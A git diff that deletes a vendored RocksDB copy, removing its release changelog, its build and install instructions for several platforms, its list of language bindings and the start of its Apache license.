-* DB::GetProperty() now accepts "rocksdb.aggregated-table-properties" and "rocksdb.aggregated-table-properties-at-levelN", in which case it returns aggregated table properties of the target column family, or the aggregated table properties of the specified level N if the "at-level" version is used.
-* Add compression option kZSTDNotFinalCompression for people to experiment ZSTD although its format is not finalized.
-* We removed the need for LATEST_BACKUP file in BackupEngine. We still keep writing it when we create new backups (because of backward compatibility), but we don't read it anymore.
-
-### Public API Changes
-* Removed class Env::RandomRWFile and Env::NewRandomRWFile().
-* Renamed DBOptions.num_subcompactions to DBOptions.max_subcompactions to make the name better match the actual functionality of the option.
-* Added Equal() method to the Comparator interface that can optionally be overwritten in cases where equality comparisons can be done more efficiently than three-way comparisons.
-* Previous 'experimental' OptimisticTransaction class has been replaced by Transaction class.
-
-## 3.13.0 (8/6/2015)
-### New Features
-* RollbackToSavePoint() in WriteBatch/WriteBatchWithIndex
-* Add NewCompactOnDeletionCollectorFactory() in utilities/table_properties_collectors, which allows rocksdb to mark a SST file as need-compaction when it observes at least D deletion entries in any N consecutive entries in that SST file.  Note that this feature depends on an experimental NeedCompact() API --- the result of this API will not persist after DB restart.
-* Add DBOptions::delete_scheduler. Use NewDeleteScheduler() in include/rocksdb/delete_scheduler.h to create a DeleteScheduler that can be shared among multiple RocksDB instances to control the file deletion rate of SST files that exist in the first db_path.
-
-### Public API Changes
-* Deprecated WriteOptions::timeout_hint_us. We no longer support write timeout. If you really need this option, talk to us and we might consider returning it.
-* Deprecated purge_redundant_kvs_while_flush option.
-* Removed BackupEngine::NewBackupEngine() and NewReadOnlyBackupEngine() that were deprecated in RocksDB 3.8. Please use BackupEngine::Open() instead.
-* Deprecated Compaction Filter V2. We are not aware of any existing use-cases. If you use this filter, your compile will break with RocksDB 3.13. Please let us know if you use it and we'll put it back in RocksDB 3.14.
-* Env::FileExists now returns a Status instead of a boolean
-* Add statistics::getHistogramString() to print detailed distribution of a histogram metric.
-* Add DBOptions::skip_stats_update_on_db_open.  When it is on, DB::Open() will run faster as it skips the random reads required for loading necessary stats from SST files to optimize compaction.
-
-## 3.12.0 (7/2/2015)
-### New Features
-* Added experimental support for optimistic transactions.  See include/rocksdb/utilities/optimistic_transaction.h for more info.
-* Added a new way to report QPS from db_bench (check out --report_file and --report_interval_seconds)
-* Added a cache for individual rows. See DBOptions::row_cache for more info.
-* Several new features on EventListener (see include/rocksdb/listener.h):
- - OnCompationCompleted() now returns per-compaction job statistics, defined in include/rocksdb/compaction_job_stats.h.
- - Added OnTableFileCreated() and OnTableFileDeleted().
-* Add compaction_options_universal.enable_trivial_move to true, to allow trivial move while performing universal compaction. Trivial move will happen only when all the input files are non overlapping.
-
-### Public API changes
-* EventListener::OnFlushCompleted() now passes FlushJobInfo instead of a list of parameters.
-* DB::GetDbIdentity() is now a const function.  If this function is overridden in your application, be sure to also make GetDbIdentity() const to avoid compile error.
-* Move listeners from ColumnFamilyOptions to DBOptions.
-* Add max_write_buffer_number_to_maintain option
-* DB::CompactRange()'s parameter reduce_level is changed to change_level, to allow users to move levels to lower levels if allowed. It can be used to migrate a DB from options.level_compaction_dynamic_level_bytes=false to options.level_compaction_dynamic_level_bytes.true.
-* Change default value for options.compaction_filter_factory and options.compaction_filter_factory_v2 to nullptr instead of DefaultCompactionFilterFactory and DefaultCompactionFilterFactoryV2.
-* If CancelAllBackgroundWork is called without doing a flush after doing loads with WAL disabled, the changes which haven't been flushed before the call to CancelAllBackgroundWork will be lost.
-* WBWIIterator::Entry() now returns WriteEntry instead of `const WriteEntry&`
-* options.hard_rate_limit is deprecated.
-* When options.soft_rate_limit or options.level0_slowdown_writes_trigger is triggered, the way to slow down writes is changed to: write rate to DB is limited to to options.delayed_write_rate.
-* DB::GetApproximateSizes() adds a parameter to allow the estimation to include data in mem table, with default to be not to include. It is now only supported in skip list mem table.
-* DB::CompactRange() now accept CompactRangeOptions instead of multiple parameters. CompactRangeOptions is defined in include/rocksdb/options.h.
-* CompactRange() will now skip bottommost level compaction for level based compaction if there is no compaction filter, bottommost_level_compaction is introduced in CompactRangeOptions to control when it's possible to skip bottommost level compaction. This mean that if you want the compaction to produce a single file you need to set bottommost_level_compaction to BottommostLevelCompaction::kForce.
-* Add Cache.GetPinnedUsage() to get the size of memory occupied by entries that are in use by the system.
-* DB:Open() will fail if the compression specified in Options is not linked with the binary. If you see this failure, recompile RocksDB with compression libraries present on your system. Also, previously our default compression was snappy. This behavior is now changed. Now, the default compression is snappy only if it's available on the system. If it isn't we change the default to kNoCompression.
-* We changed how we account for memory used in block cache. Previously, we only counted the sum of block sizes currently present in block cache. Now, we count the actual memory usage of the blocks. For example, a block of size 4.5KB will use 8KB memory with jemalloc. This might decrease your memory usage and possibly decrease performance. Increase block cache size if you see this happening after an upgrade.
-* Add BackupEngineImpl.options_.max_background_operations to specify the maximum number of operations that may be performed in parallel. Add support for parallelized backup and restore.
-* Add DB::SyncWAL() that does a WAL sync without blocking writers.
-
-## 3.11.0 (5/19/2015)
-### New Features
-* Added a new API Cache::SetCapacity(size_t capacity) to dynamically change the maximum configured capacity of the cache. If the new capacity is less than the existing cache usage, the implementation will try to lower the usage by evicting the necessary number of elements following a strict LRU policy.
-* Added an experimental API for handling flashcache devices (blacklists background threads from caching their reads) -- NewFlashcacheAwareEnv
-* If universal compaction is used and options.num_levels > 1, compact files are tried to be stored in none-L0 with smaller files based on options.target_file_size_base. The limitation of DB size when using universal compaction is greatly mitigated by using more levels. You can set num_levels = 1 to make universal compaction behave as before. If you set num_levels > 1 and want to roll back to a previous version, you need to compact all files to a big file in level 0 (by setting target_file_size_base to be large and CompactRange(<cf_handle>, nullptr, nullptr, true, 0) and reopen the DB with the same version to rewrite the manifest, and then you can open it using previous releases.
-* More information about rocksdb background threads are available in Env::GetThreadList(), including the number of bytes read / written by a compaction job, mem-table size and current number of bytes written by a flush job and many more.  Check include/rocksdb/thread_status.h for more detail.
-
-### Public API changes
-* TablePropertiesCollector::AddUserKey() is added to replace TablePropertiesCollector::Add(). AddUserKey() exposes key type, sequence number and file size up to now to users.
-* DBOptions::bytes_per_sync used to apply to both WAL and table files. As of 3.11 it applies only to table files. If you want to use this option to sync WAL in the background, please use wal_bytes_per_sync
-
-## 3.10.0 (3/24/2015)
-### New Features
-* GetThreadStatus() is now able to report detailed thread status, including:
- - Thread Operation including flush and compaction.
- - The stage of the current thread operation.
- - The elapsed time in micros since the current thread operation started.
- More information can be found in include/rocksdb/thread_status.h.  In addition, when running db_bench with --thread_status_per_interval, db_bench will also report thread status periodically.
-* Changed the LRU caching algorithm so that referenced blocks (by iterators) are never evicted. This change made parameter removeScanCountLimit obsolete. Because of that NewLRUCache doesn't take three arguments anymore. table_cache_remove_scan_limit option is also removed
-* By default we now optimize the compilation for the compilation platform (using -march=native). If you want to build portable binary, use 'PORTABLE=1' before the make command.
-* We now allow level-compaction to place files in different paths by
-  specifying them in db_paths along with the target_size.
-  Lower numbered levels will be placed earlier in the db_paths and higher
-  numbered levels will be placed later in the db_paths vector.
-* Potentially big performance improvements if you're using RocksDB with lots of column families (100-1000)
-* Added BlockBasedTableOptions.format_version option, which allows user to specify which version of block based table he wants. As a general guideline, newer versions have more features, but might not be readable by older versions of RocksDB.
-* Added new block based table format (version 2), which you can enable by setting BlockBasedTableOptions.format_version = 2. This format changes how we encode size information in compressed blocks and should help with memory allocations if you're using Zlib or BZip2 compressions.
-* MemEnv (env that stores data in memory) is now available in default library build. You can create it by calling NewMemEnv().
-* Add SliceTransform.SameResultWhenAppended() to help users determine it is safe to apply prefix bloom/hash.
-* Block based table now makes use of prefix bloom filter if it is a full fulter.
-* Block based table remembers whether a whole key or prefix based bloom filter is supported in SST files. Do a sanity check when reading the file with users' configuration.
-* Fixed a bug in ReadOnlyBackupEngine that deleted corrupted backups in some cases, even though the engine was ReadOnly
-* options.level_compaction_dynamic_level_bytes, a feature to allow RocksDB to pick dynamic base of bytes for levels. With this feature turned on, we will automatically adjust max bytes for each level. The goal of this feature is to have lower bound on size amplification. For more details, see comments in options.h.
-* Added an abstract base class WriteBatchBase for write batches
-* Fixed a bug where we start deleting files of a dropped column families even if there are still live references to it
-
-### Public API changes
-* Deprecated skip_log_error_on_recovery and table_cache_remove_scan_count_limit options.
-* Logger method logv with log level parameter is now virtual
-
-### RocksJava
-* Added compression per level API.
-* MemEnv is now available in RocksJava via RocksMemEnv class.
-* lz4 compression is now included in rocksjava static library when running `make rocksdbjavastatic`.
-* Overflowing a size_t when setting rocksdb options now throws an IllegalArgumentException, which removes the necessity for a developer to catch these Exceptions explicitly.
-
-## 3.9.0 (12/8/2014)
-
-### New Features
-* Add rocksdb::GetThreadList(), which in the future will return the current status of all
-  rocksdb-related threads.  We will have more code instruments in the following RocksDB
-  releases.
-* Change convert function in rocksdb/utilities/convenience.h to return Status instead of boolean.
-  Also add support for nested options in convert function
-
-### Public API changes
-* New API to create a checkpoint added. Given a directory name, creates a new
-  database which is an image of the existing database.
-* New API LinkFile added to Env. If you implement your own Env class, an
-  implementation of the API LinkFile will have to be provided.
-* MemTableRep takes MemTableAllocator instead of Arena
-
-### Improvements
-* RocksDBLite library now becomes smaller and will be compiled with -fno-exceptions flag.
-
-## 3.8.0 (11/14/2014)
-
-### Public API changes
-* BackupEngine::NewBackupEngine() was deprecated; please use BackupEngine::Open() from now on.
-* BackupableDB/RestoreBackupableDB have new GarbageCollect() methods, which will clean up files from corrupt and obsolete backups.
-* BackupableDB/RestoreBackupableDB have new GetCorruptedBackups() methods which list corrupt backups.
-
-### Cleanup
-* Bunch of code cleanup, some extra warnings turned on (-Wshadow, -Wshorten-64-to-32, -Wnon-virtual-dtor)
-
-### New features
-* CompactFiles and EventListener, although they are still in experimental state
-* Full ColumnFamily support in RocksJava.
-
-## 3.7.0 (11/6/2014)
-### Public API changes
-* Introduce SetOptions() API to allow adjusting a subset of options dynamically online
-* Introduce 4 new convenient functions for converting Options from string: GetColumnFamilyOptionsFromMap(), GetColumnFamilyOptionsFromString(), GetDBOptionsFromMap(), GetDBOptionsFromString()
-* Remove WriteBatchWithIndex.Delete() overloads using SliceParts
-* When opening a DB, if options.max_background_compactions is larger than the existing low pri pool of options.env, it will enlarge it. Similarly, options.max_background_flushes is larger than the existing high pri pool of options.env, it will enlarge it.
-
-## 3.6.0 (10/7/2014)
-### Disk format changes
-* If you're using RocksDB on ARM platforms and you're using default bloom filter, there is a disk format change you need to be aware of. There are three steps you need to do when you convert to new release: 1. turn off filter policy, 2. compact the whole database, 3. turn on filter policy
-
-### Behavior changes
-* We have refactored our system of stalling writes.  Any stall-related statistics' meanings are changed. Instead of per-write stall counts, we now count stalls per-epoch, where epochs are periods between flushes and compactions. You'll find more information in our Tuning Perf Guide once we release RocksDB 3.6.
-* When disableDataSync=true, we no longer sync the MANIFEST file.
-* Add identity_as_first_hash property to CuckooTable. SST file needs to be rebuilt to be opened by reader properly.
-
-### Public API changes
-* Change target_file_size_base type to uint64_t from int.
-* Remove allow_thread_local. This feature was proved to be stable, so we are turning it always-on.
-
-## 3.5.0 (9/3/2014)
-### New Features
-* Add include/utilities/write_batch_with_index.h, providing a utility class to query data out of WriteBatch when building it.
-* Move BlockBasedTable related options to BlockBasedTableOptions from Options. Change corresponding JNI interface. Options affected include:
-  no_block_cache, block_cache, block_cache_compressed, block_size, block_size_deviation, block_restart_interval, filter_policy, whole_key_filtering. filter_policy is changed to shared_ptr from a raw pointer.
-* Remove deprecated options: disable_seek_compaction and db_stats_log_interval
-* OptimizeForPointLookup() takes one parameter for block cache size. It now builds hash index, bloom filter, and block cache.
-
-### Public API changes
-* The Prefix Extractor used with V2 compaction filters is now passed user key to SliceTransform::Transform instead of unparsed RocksDB key.
-
-## 3.4.0 (8/18/2014)
-### New Features
-* Support Multiple DB paths in universal style compactions
-* Add feature of storing plain table index and bloom filter in SST file.
-* CompactRange() will never output compacted files to level 0. This used to be the case when all the compaction input files were at level 0.
-* Added iterate_upper_bound to define the extent upto which the forward iterator will return entries. This will prevent iterating over delete markers and overwritten entries for edge cases where you want to break out the iterator anyways. This may improve performance in case there are a large number of delete markers or overwritten entries.
-
-### Public API changes
-* DBOptions.db_paths now is a vector of a DBPath structure which indicates both of path and target size
-* NewPlainTableFactory instead of bunch of parameters now accepts PlainTableOptions, which is defined in include/rocksdb/table.h
-* Moved include/utilities/*.h to include/rocksdb/utilities/*.h
-* Statistics APIs now take uint32_t as type instead of Tickers. Also make two access functions getTickerCount and histogramData const
-* Add DB property rocksdb.estimate-num-keys, estimated number of live keys in DB.
-* Add DB::GetIntProperty(), which returns DB properties that are integer as uint64_t.
-* The Prefix Extractor used with V2 compaction filters is now passed user key to SliceTransform::Transform instead of unparsed RocksDB key.
-
-## 3.3.0 (7/10/2014)
-### New Features
-* Added JSON API prototype.
-* HashLinklist reduces performance outlier caused by skewed bucket by switching data in the bucket from linked list to skip list. Add parameter threshold_use_skiplist in NewHashLinkListRepFactory().
-* RocksDB is now able to reclaim storage space more effectively during the compaction process.  This is done by compensating the size of each deletion entry by the 2X average value size, which makes compaction to be triggered by deletion entries more easily.
-* Add TimeOut API to write.  Now WriteOptions have a variable called timeout_hint_us.  With timeout_hint_us set to non-zero, any write associated with this timeout_hint_us may be aborted when it runs longer than the specified timeout_hint_us, and it is guaranteed that any write completes earlier than the specified time-out will not be aborted due to the time-out condition.
-* Add a rate_limiter option, which controls total throughput of flush and compaction. The throughput is specified in bytes/sec. Flush always has precedence over compaction when available bandwidth is constrained.
-
-### Public API changes
-* Removed NewTotalOrderPlainTableFactory because it is not used and implemented semantically incorrect.
-
-## 3.2.0 (06/20/2014)
-
-### Public API changes
-* We removed seek compaction as a concept from RocksDB because:
-1) It makes more sense for spinning disk workloads, while RocksDB is primarily designed for flash and memory,
-2) It added some complexity to the important code-paths,
-3) None of our internal customers were really using it.
-Because of that, Options::disable_seek_compaction is now obsolete. It is still a parameter in Options, so it does not break the build, but it does not have any effect. We plan to completely remove it at some point, so we ask users to please remove this option from your code base.
-* Add two parameters to NewHashLinkListRepFactory() for logging on too many entries in a hash bucket when flushing.
-* Added new option BlockBasedTableOptions::hash_index_allow_collision. When enabled, prefix hash index for block-based table will not store prefix and allow hash collision, reducing memory consumption.
-
-### New Features
-* PlainTable now supports a new key encoding: for keys of the same prefix, the prefix is only written once. It can be enabled through encoding_type parameter of NewPlainTableFactory()
-* Add AdaptiveTableFactory, which is used to convert from a DB of PlainTable to BlockBasedTabe, or vise versa. It can be created using NewAdaptiveTableFactory()
-
-### Performance Improvements
-* Tailing Iterator re-implemeted with ForwardIterator + Cascading Search Hint , see ~20% throughput improvement.
-
-## 3.1.0 (05/21/2014)
-
-### Public API changes
-* Replaced ColumnFamilyOptions::table_properties_collectors with ColumnFamilyOptions::table_properties_collector_factories
-
-### New Features
-* Hash index for block-based table will be materialized and reconstructed more efficiently. Previously hash index is constructed by scanning the whole table during every table open.
-* FIFO compaction style
-
-## 3.0.0 (05/05/2014)
-
-### Public API changes
-* Added _LEVEL to all InfoLogLevel enums
-* Deprecated ReadOptions.prefix and ReadOptions.prefix_seek. Seek() defaults to prefix-based seek when Options.prefix_extractor is supplied. More detail is documented in https://github.com/facebook/rocksdb/wiki/Prefix-Seek-API-Changes
-* MemTableRepFactory::CreateMemTableRep() takes info logger as an extra parameter.
-
-### New Features
-* Column family support
-* Added an option to use different checksum functions in BlockBasedTableOptions
-* Added ApplyToAllCacheEntries() function to Cache
-
-## 2.8.0 (04/04/2014)
-
-* Removed arena.h from public header files.
-* By default, checksums are verified on every read from database
-* Change default value of several options, including: paranoid_checks=true, max_open_files=5000, level0_slowdown_writes_trigger=20, level0_stop_writes_trigger=24, disable_seek_compaction=true, max_background_flushes=1 and allow_mmap_writes=false
-* Added is_manual_compaction to CompactionFilter::Context
-* Added "virtual void WaitForJoin()" in class Env. Default operation is no-op.
-* Removed BackupEngine::DeleteBackupsNewerThan() function
-* Added new option -- verify_checksums_in_compaction
-* Changed Options.prefix_extractor from raw pointer to shared_ptr (take ownership)
-  Changed HashSkipListRepFactory and HashLinkListRepFactory constructor to not take SliceTransform object (use Options.prefix_extractor implicitly)
-* Added Env::GetThreadPoolQueueLen(), which returns the waiting queue length of thread pools
-* Added a command "checkconsistency" in ldb tool, which checks
-  if file system state matches DB state (file existence and file sizes)
-* Separate options related to block based table to a new struct BlockBasedTableOptions.
-* WriteBatch has a new function Count() to return total size in the batch, and Data() now returns a reference instead of a copy
-* Add more counters to perf context.
-* Supports several more DB properties: compaction-pending, background-errors and cur-size-active-mem-table.
-
-### New Features
-* If we find one truncated record at the end of the MANIFEST or WAL files,
-  we will ignore it. We assume that writers of these records were interrupted
-  and that we can safely ignore it.
-* A new SST format "PlainTable" is added, which is optimized for memory-only workloads. It can be created through NewPlainTableFactory() or NewTotalOrderPlainTableFactory().
-* A new mem table implementation hash linked list optimizing for the case that there are only few keys for each prefix, which can be created through NewHashLinkListRepFactory().
-* Merge operator supports a new function PartialMergeMulti() to allow users to do partial merges against multiple operands.
-* Now compaction filter has a V2 interface. It buffers the kv-pairs sharing the same key prefix, process them in batches, and return the batched results back to DB. The new interface uses a new structure CompactionFilterContext for the same purpose as CompactionFilter::Context in V1.
-* Geo-spatial support for locations and radial-search.
-
-## 2.7.0 (01/28/2014)
-
-### Public API changes
-
-* Renamed `StackableDB::GetRawDB()` to `StackableDB::GetBaseDB()`.
-* Renamed `WriteBatch::Data()` `const std::string& Data() const`.
-* Renamed class `TableStats` to `TableProperties`.
-* Deleted class `PrefixHashRepFactory`. Please use `NewHashSkipListRepFactory()` instead.
-* Supported multi-threaded `EnableFileDeletions()` and `DisableFileDeletions()`.
-* Added `DB::GetOptions()`.
-* Added `DB::GetDbIdentity()`.
-
-### New Features
-
-* Added [BackupableDB](https://github.com/facebook/rocksdb/wiki/How-to-backup-RocksDB%3F)
-* Implemented [TailingIterator](https://github.com/facebook/rocksdb/wiki/Tailing-Iterator), a special type of iterator that
-  doesn't create a snapshot (can be used to read newly inserted data)
-  and is optimized for doing sequential reads.
-* Added property block for table, which allows (1) a table to store
-  its metadata and (2) end user to collect and store properties they
-  are interested in.
-* Enabled caching index and filter block in block cache (turned off by default).
-* Supported error report when doing manual compaction.
-* Supported additional Linux platform flavors and Mac OS.
-* Put with `SliceParts` - Variant of `Put()` that gathers output like `writev(2)`
-* Bug fixes and code refactor for compatibility with upcoming Column
-  Family feature.
-
-### Performance Improvements
-
-* Huge benchmark performance improvements by multiple efforts. For example, increase in readonly QPS from about 530k in 2.6 release to 1.1 million in 2.7 [1]
-* Speeding up a way RocksDB deleted obsolete files - no longer listing the whole directory under a lock -- decrease in p99
-* Use raw pointer instead of shared pointer for statistics: [5b825d](https://github.com/facebook/rocksdb/commit/5b825d6964e26ec3b4bb6faa708ebb1787f1d7bd) -- huge increase in performance -- shared pointers are slow
-* Optimized locking for `Get()` -- [1fdb3f](https://github.com/facebook/rocksdb/commit/1fdb3f7dc60e96394e3e5b69a46ede5d67fb976c) -- 1.5x QPS increase for some workloads
-* Cache speedup - [e8d40c3](https://github.com/facebook/rocksdb/commit/e8d40c31b3cca0c3e1ae9abe9b9003b1288026a9)
-* Implemented autovector, which allocates first N elements on stack. Most of vectors in RocksDB are small. Also, we never want to allocate heap objects while holding a mutex. -- [c01676e4](https://github.com/facebook/rocksdb/commit/c01676e46d3be08c3c140361ef1f5884f47d3b3c)
-* Lots of efforts to move malloc, memcpy and IO outside of locks
diff --git a/thirdparty/rocksdb/INSTALL.md b/thirdparty/rocksdb/INSTALL.md
deleted file mode 100644
index 04f0eb2..0000000
--- a/thirdparty/rocksdb/INSTALL.md
+++ /dev/null
@@ -1,144 +0,0 @@
-## Compilation
-
-**Important**: If you plan to run RocksDB in production, don't compile using default
-`make` or `make all`. That will compile RocksDB in debug mode, which is much slower
-than release mode.
-
-RocksDB's library should be able to compile without any dependency installed,
-although we recommend installing some compression libraries (see below).
-We do depend on newer gcc/clang with C++11 support.
-
-There are few options when compiling RocksDB:
-
-* [recommended] `make static_lib` will compile librocksdb.a, RocksDB static library. Compiles static library in release mode.
-
-* `make shared_lib` will compile librocksdb.so, RocksDB shared library. Compiles shared library in release mode.
-
-* `make check` will compile and run all the unit tests. `make check` will compile RocksDB in debug mode.
-
-* `make all` will compile our static library, and all our tools and unit tests. Our tools
-depend on gflags. You will need to have gflags installed to run `make all`. This will compile RocksDB in debug mode. Don't
-use binaries compiled by `make all` in production.
-
-* By default the binary we produce is optimized for the platform you're compiling on
-(`-march=native` or the equivalent). SSE4.2 will thus be enabled automatically if your
-CPU supports it. To print a warning if your CPU does not support SSE4.2, build with
-`USE_SSE=1 make static_lib` or, if using CMake, `cmake -DFORCE_SSE42=ON`. If you want
-to build a portable binary, add `PORTABLE=1` before your make commands, like this:
-`PORTABLE=1 make static_lib`.
-
-## Dependencies
-
-* You can link RocksDB with following compression libraries:
-  - [zlib](http://www.zlib.net/) - a library for data compression.
-  - [bzip2](http://www.bzip.org/) - a library for data compression.
-  - [lz4](https://github.com/lz4/lz4) - a library for extremely fast data compression.
-  - [snappy](http://google.github.io/snappy/) - a library for fast
-      data compression.
-  - [zstandard](http://www.zstd.net) - Fast real-time compression
-      algorithm.
-
-* All our tools depend on:
-  - [gflags](https://gflags.github.io/gflags/) - a library that handles
-      command line flags processing. You can compile rocksdb library even
-      if you don't have gflags installed.
-
-## Supported platforms
-
-* **Linux - Ubuntu**
-    * Upgrade your gcc to version at least 4.8 to get C++11 support.
-    * Install gflags. First, try: `sudo apt-get install libgflags-dev`
-      If this doesn't work and you're using Ubuntu, here's a nice tutorial:
-      (http://askubuntu.com/questions/312173/installing-gflags-12-04)
-    * Install snappy. This is usually as easy as:
-      `sudo apt-get install libsnappy-dev`.
-    * Install zlib. Try: `sudo apt-get install zlib1g-dev`.
-    * Install bzip2: `sudo apt-get install libbz2-dev`.
-    * Install lz4: `sudo apt-get install liblz4-dev`.
-    * Install zstandard: `sudo apt-get install libzstd-dev`.
-
-* **Linux - CentOS / RHEL**
-    * Upgrade your gcc to version at least 4.8 to get C++11 support:
-      `yum install gcc48-c++`
-    * Install gflags:
-
-              git clone https://github.com/gflags/gflags.git
-              cd gflags
-              git checkout v2.0
-              ./configure && make && sudo make install
-
-      **Notice**: Once installed, please add the include path for gflags to your `CPATH` environment variable and the
-      lib path to `LIBRARY_PATH`. If installed with default settings, the include path will be `/usr/local/include`
-      and the lib path will be `/usr/local/lib`.
-
-    * Install snappy:
-
-              sudo yum install snappy snappy-devel
-
-    * Install zlib:
-
-              sudo yum install zlib zlib-devel
-
-    * Install bzip2:
-
-              sudo yum install bzip2 bzip2-devel
-
-    * Install lz4:
-
-              sudo yum install lz4-devel
-
-    * Install ASAN (optional for debugging):
-
-              sudo yum install libasan
-
-    * Install zstandard:
-
-             wget https://github.com/facebook/zstd/archive/v1.1.3.tar.gz
-             mv v1.1.3.tar.gz zstd-1.1.3.tar.gz
-             tar zxvf zstd-1.1.3.tar.gz
-             cd zstd-1.1.3
-             make && sudo make install
-
-* **OS X**:
-    * Install latest C++ compiler that supports C++ 11:
-        * Update XCode:  run `xcode-select --install` (or install it from XCode App's settting).
-        * Install via [homebrew](http://brew.sh/).
-            * If you're first time developer in MacOS, you still need to run: `xcode-select --install` in your command line.
-            * run `brew tap homebrew/versions; brew install gcc48 --use-llvm` to install gcc 4.8 (or higher).
-    * run `brew install rocksdb`
-
-* **iOS**:
-  * Run: `TARGET_OS=IOS make static_lib`. When building the project which uses rocksdb iOS library, make sure to define two important pre-processing macros: `ROCKSDB_LITE` and `IOS_CROSS_COMPILE`.
-
-* **Windows**:
-  * For building with MS Visual Studio 13 you will need Update 4 installed.
-  * Read and follow the instructions at CMakeLists.txt
-  * Or install via [vcpkg](https://github.com/microsoft/vcpkg) 
-       * run `vcpkg install rocksdb`
-
-* **AIX 6.1**
-    * Install AIX Toolbox rpms with gcc
-    * Use these environment variables:
-  
-             export PORTABLE=1
-             export CC=gcc
-             export AR="ar -X64"
-             export EXTRA_ARFLAGS=-X64
-             export EXTRA_CFLAGS=-maix64
-             export EXTRA_CXXFLAGS=-maix64
-             export PLATFORM_LDFLAGS="-static-libstdc++ -static-libgcc"
-             export LIBPATH=/opt/freeware/lib
-             export JAVA_HOME=/usr/java8_64
-             export PATH=/opt/freeware/bin:$PATH
-  
-* **Solaris Sparc**
-    * Install GCC 4.8.2 and higher.
-    * Use these environment variables:
-
-             export CC=gcc
-             export EXTRA_CFLAGS=-m64
-             export EXTRA_CXXFLAGS=-m64
-             export EXTRA_LDFLAGS=-m64
-             export PORTABLE=1
-             export PLATFORM_LDFLAGS="-static-libstdc++ -static-libgcc"
-
diff --git a/thirdparty/rocksdb/LANGUAGE-BINDINGS.md b/thirdparty/rocksdb/LANGUAGE-BINDINGS.md
deleted file mode 100644
index ffeed98..0000000
--- a/thirdparty/rocksdb/LANGUAGE-BINDINGS.md
+++ /dev/null
@@ -1,16 +0,0 @@
-This is the list of all known third-party language bindings for RocksDB. If something is missing, please open a pull request to add it.
-
-* Java - https://github.com/facebook/rocksdb/tree/master/java
-* Python - http://pyrocksdb.readthedocs.org/en/latest/
-* Perl - https://metacpan.org/pod/RocksDB
-* Node.js - https://npmjs.org/package/rocksdb
-* Go - https://github.com/tecbot/gorocksdb
-* Ruby - http://rubygems.org/gems/rocksdb-ruby
-* Haskell - https://hackage.haskell.org/package/rocksdb-haskell
-* PHP - https://github.com/Photonios/rocksdb-php
-* C# - https://github.com/warrenfalk/rocksdb-sharp
-* Rust
-    * https://github.com/spacejam/rust-rocksdb
-    * https://github.com/bh1xuw/rust-rocks
-* D programming language - https://github.com/b1naryth1ef/rocksdb
-* Erlang - https://gitlab.com/barrel-db/erlang-rocksdb
diff --git a/thirdparty/rocksdb/LICENSE.Apache b/thirdparty/rocksdb/LICENSE.Apache
deleted file mode 100644
index d645695..0000000
--- a/thirdparty/rocksdb/LICENSE.Apache
+++ /dev/null
@@ -1,202 +0,0 @@
-
-                                 Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
